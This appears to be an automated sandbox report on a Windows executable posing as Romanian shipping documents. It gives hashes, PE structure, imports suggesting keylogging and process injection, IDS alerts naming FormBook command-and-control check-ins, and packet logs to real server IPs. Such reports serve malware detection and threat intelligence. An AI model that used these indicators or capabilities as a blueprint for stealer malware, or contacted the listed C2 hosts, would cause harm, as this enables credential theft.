Preview:	.n.AQ7G9RQU7..U4.AR7G9VQ.7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RA.7G9XN.9Y.\.s.S{...9<DyE'[533ZgZ7?;X-.7Qr3'YgP8q.x..8[6$\|:J3rQU7Y5U4+@[.zY1.hW>.hT5.H...l12.C...n!5.]...iW>..]1)oW .VQU7Y5U4..R7.8WQ.[$kU4RAR7G9.QW6R4^4R.V7G9VQU7Y5.'RAR'G9V!Q7Y5.4RQR7G;VQS7Y5U4RAT7G9VQU7YEQ4RCR7G9VQW7..U4BAR'G9VQE7Y%U4RAR7W9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7wA0L&AR7.cRQU'Y5UhVAR'G9VQU7Y5U4RAR7g9V1U7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7

C:\Users\user\AppData\Local\Temp\corynteria

Download File

Process:	C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe
File Type:	data
Category:	dropped
Size (bytes):	290304
Entropy (8bit):	7.9924146979310535
Encrypted:	true
SSDEEP:	6144:KDvAWDDDDDDDDcPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDy:Fz8fnUmyPsS/aIFVelBTDn7
MD5:	BBA1B386F3AE1207B22C81972194B68C
SHA1:	3F42916729E813A08C30B8D5C1C56D727CC7390D
SHA-256:	3DD63B8D8CFE959D5DCF4A8AABB3BE87C96FBD691DBFA98BF3DCA7C7A4089B4E
SHA-512:	EF48BAB28FB321E51B144E8EC3950B8373B2C0991F34489911529352D4994E28ACFDC14D8BE1F565B8BB287D675312525BA0A2B688E369D87A4A86E907AF578A
Malicious:	false
Reputation:	low
Preview:	.n.AQ7G9RQU7..U4.AR7G9VQ.7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RA.7G9XN.9Y.\.s.S{...9<DyE'[533ZgZ7?;X-.7Qr3'YgP8q.x..8[6$\|:J3rQU7Y5U4+@[.zY1.hW>.hT5.H...l12.C...n!5.]...iW>..]1)oW .VQU7Y5U4..R7.8WQ.[$kU4RAR7G9.QW6R4^4R.V7G9VQU7Y5.'RAR'G9V!Q7Y5.4RQR7G;VQS7Y5U4RAT7G9VQU7YEQ4RCR7G9VQW7..U4BAR'G9VQE7Y%U4RAR7W9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7wA0L&AR7.cRQU'Y5UhVAR'G9VQU7Y5U4RAR7g9V1U7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7G9VQU7Y5U4RAR7

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.159549326870946
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	AWB_5771388044 Documente de expediere.exe
File size:	1'226'240 bytes
MD5:	53bc8d5aec130cb17e4f2a277b722bf2
SHA1:	b84460732b23ab76d0cac4d1c5c86bdf5279774f
SHA256:	cf789e7c76e35f7b7f1a26463290aa94d05e2dd71b813f5eae75cdbc83bbed6b
SHA512:	ee4a89861b1dc2a375260a067bc7730ea97efc6232170dda9d68ba146bfa59c902bab35258ecfe6ea49cdfba3581d82c94f7cc5de5958de8a86159b2feb5db39
SSDEEP:	24576:6tb20pkaCqT5TBWgNQ7aDl1/qzyOOEcL8RzPRijt6A:nVg5tQ7aDl1FEcL8RzPEh5
TLSH:	2545D02363DD8361C7B25273BA25B7416EBB7C2506B5F96B2FD4093DF820122521EA73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x674914C3 [Fri Nov 29 01:11:31 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F579D38F25Fh
jmp 00007F579D382274h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F579D3823FAh
cmp edi, eax
jc 00007F579D38275Eh
bt dword ptr [004C0158h], 01h
jnc 00007F579D3823F9h
rep movsb
jmp 00007F579D38270Ch
cmp ecx, 00000080h
jc 00007F579D3825C4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F579D382400h
bt dword ptr [004BA370h], 01h
jc 00007F579D3828D0h
bt dword ptr [004C0158h], 00000000h
jnc 00007F579D38259Dh
test edi, 00000003h
jne 00007F579D3825AEh
test esi, 00000003h
jne 00007F579D38258Dh
bt edi, 02h
jnc 00007F579D3823FFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F579D382403h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F579D382455h
bt esi, 03h
jnc 00007F579D3824A8h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x624e4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x127000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x624e4	0x62600	021b98d28a2c4779a654f7570bbc28c6	False	0.9332041176937739	data	7.905969388180345	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x127000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x597eb	data			1.0003300861224702
RT_GROUP_ICON	0x125fa4	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x12601c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x126030	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x126044	0x14	data	English	Great Britain	1.25
RT_VERSION	0x126058	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x126134	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-09T13:14:07.923153+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49763	108.179.253.197	80	TCP
2024-12-09T13:14:07.923153+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49763	108.179.253.197	80	TCP
2024-12-09T13:14:24.614014+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49804	108.181.189.7	80	TCP
2024-12-09T13:14:27.263633+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49810	108.181.189.7	80	TCP
2024-12-09T13:14:29.924955+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49819	108.181.189.7	80	TCP
2024-12-09T13:14:32.581126+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49827	108.181.189.7	80	TCP
2024-12-09T13:14:32.581126+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49827	108.181.189.7	80	TCP
2024-12-09T13:14:39.171086+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49843	13.248.169.48	80	TCP
2024-12-09T13:14:41.768649+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49849	13.248.169.48	80	TCP
2024-12-09T13:14:44.469996+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49855	13.248.169.48	80	TCP
2024-12-09T13:14:47.088788+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49861	13.248.169.48	80	TCP
2024-12-09T13:14:47.088788+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49861	13.248.169.48	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 13:14:06.574224949 CET	49763	80	192.168.2.4	108.179.253.197
Dec 9, 2024 13:14:06.693598986 CET	80	49763	108.179.253.197	192.168.2.4
Dec 9, 2024 13:14:06.693761110 CET	49763	80	192.168.2.4	108.179.253.197
Dec 9, 2024 13:14:06.703543901 CET	49763	80	192.168.2.4	108.179.253.197
Dec 9, 2024 13:14:06.822977066 CET	80	49763	108.179.253.197	192.168.2.4
Dec 9, 2024 13:14:07.877156019 CET	80	49763	108.179.253.197	192.168.2.4
Dec 9, 2024 13:14:07.923152924 CET	49763	80	192.168.2.4	108.179.253.197
Dec 9, 2024 13:14:12.878623009 CET	80	49763	108.179.253.197	192.168.2.4
Dec 9, 2024 13:14:12.878765106 CET	49763	80	192.168.2.4	108.179.253.197
Dec 9, 2024 13:14:12.880239010 CET	49763	80	192.168.2.4	108.179.253.197
Dec 9, 2024 13:14:12.999505043 CET	80	49763	108.179.253.197	192.168.2.4
Dec 9, 2024 13:14:23.315835953 CET	49804	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:23.435203075 CET	80	49804	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:23.435631990 CET	49804	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:23.447290897 CET	49804	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:23.566680908 CET	80	49804	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:24.613518953 CET	80	49804	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:24.613967896 CET	80	49804	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:24.614013910 CET	49804	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:24.614118099 CET	80	49804	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:24.614161968 CET	49804	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:24.954375982 CET	49804	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:25.972585917 CET	49810	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:26.092166901 CET	80	49810	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:26.095098019 CET	49810	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:26.106379032 CET	49810	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:26.225646973 CET	80	49810	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:27.263535976 CET	80	49810	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:27.263582945 CET	80	49810	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:27.263633013 CET	49810	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:27.263994932 CET	80	49810	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:27.264034986 CET	49810	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:27.630595922 CET	49810	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:28.644341946 CET	49819	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:28.763641119 CET	80	49819	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:28.765683889 CET	49819	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:28.777446032 CET	49819	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:28.896884918 CET	80	49819	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:28.896908998 CET	80	49819	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:28.896966934 CET	80	49819	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:28.896998882 CET	80	49819	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:28.897116899 CET	80	49819	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:28.897126913 CET	80	49819	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:28.897171974 CET	80	49819	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:28.897224903 CET	80	49819	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:28.897281885 CET	80	49819	108.181.189.7	192.168.2.4
